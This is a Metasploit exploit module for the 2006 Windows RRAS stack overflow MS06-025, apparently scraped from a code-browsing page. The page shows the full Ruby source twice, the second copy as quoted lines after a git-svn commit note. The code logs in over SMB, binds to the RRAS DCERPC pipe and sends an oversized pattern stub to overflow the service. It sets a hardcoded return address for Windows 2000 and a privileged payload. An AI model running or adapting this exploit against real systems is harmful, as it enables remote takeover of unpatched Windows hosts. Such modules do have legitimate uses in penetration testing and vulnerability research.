metasploit-framework/modules/exploits/windows/smb/ms06_025_rras.rb

require 'msf/core'

module Msf

class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote

	include Exploit::Remote::DCERPC
	include Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft RRAS MS06-025 Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the RRAS
				service shipped with each version of Windows. This
				vulnerability is not accessible to anonymous users
				on any platform other than Windows XP SP1.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'MSB', 'MS06-025'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "",
					'Compat'   => 
					{
						# -ws2ord XXX?
					},
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 
						'Windows 2000 TEST',
						{
							'Ret'      => 0x767a38f6, # umpnpmgr.dll
						}
					]														
				],

			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 13 2006'))
			
		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (router, srvsvc)", 'router']),
			], self.class)
						
	end

	def exploit	
		
		connect()
		smb_login()

		handle = dcerpc_handle('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
		
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")


		str = [1, 0x49].pack('VV') + Rex::Text.pattern_create(0x4000) + "\x00"

		stubdata = 
			# [1, ... and [2, ... result in different crashes...
			[1, str.length, 0, str.length].pack('VVVV') + str + NDR.long(str.length) 

		begin
			dcerpc.call(0x0C, stubdata)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			print_good('server did not respond, this is expected')
		rescue => e
			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
				print_good('server disconnected, this is expected')
			else
				raise e
			end
		else 
			print_status('should be owned now...')
		end

		# Cleanup
		handler
		disconnect
		
		p dcerpc.last_response.stub_data

	end

end
end
Wee git-svn-id: file:///home/svn/incoming/trunk@3661 4d416f70-5f16-0410-b530-b9f4589650da 2006-06-14 20:39:16 +00:00			`require 'msf/core'`

			`module Msf`

			`class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote`

			`include Exploit::Remote::DCERPC`
			`include Exploit::Remote::SMB`


			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Microsoft RRAS MS06-025 Overflow',`
			`'Description' => %q{`
			`This module exploits a stack overflow in the RRAS`
			`service shipped with each version of Windows. This`
			`vulnerability is not accessible to anonymous users`
			`on any platform other than Windows XP SP1.`
			`},`
			`'Author' => [ 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'MSB', 'MS06-025'],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'Space' => 1000,`
			`'BadChars' => "",`
			`'Compat' =>`
			`{`
			`# -ws2ord XXX?`
			`},`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[`
			`'Windows 2000 TEST',`
			`{`
			`'Ret' => 0x767a38f6, # umpnpmgr.dll`
			`}`
			`]`
			`],`

			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Jun 13 2006'))`

			`register_options(`
			`[`
			`OptString.new('SMBPIPE', [ true, "The pipe name to use (router, srvsvc)", 'router']),`
			`], self.class)`

			`end`

			`def exploit`

			`connect()`
			`smb_login()`

			`handle = dcerpc_handle('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])`

			`print_status("Binding to #{handle} ...")`
			`dcerpc_bind(handle)`
			`print_status("Bound to #{handle} ...")`


			`str = [1, 0x49].pack('VV') + Rex::Text.pattern_create(0x4000) + "\x00"`

			`stubdata =`
			`# [1, ... and [2, ... result in different crashes...`
			`[1, str.length, 0, str.length].pack('VVVV') + str + NDR.long(str.length)`

			`begin`
			`dcerpc.call(0x0C, stubdata)`
			`rescue Rex::Proto::DCERPC::Exceptions::NoResponse`
			`print_good('server did not respond, this is expected')`
			`rescue => e`
			`if e.to_s =~ /STATUS_PIPE_DISCONNECTED/`
			`print_good('server disconnected, this is expected')`
			`else`
			`raise e`
			`end`
			`else`
			`print_status('should be owned now...')`
			`end`

			`# Cleanup`
			`handler`
			`disconnect`

			`p dcerpc.last_response.stub_data`

			`end`

			`end`
			`end`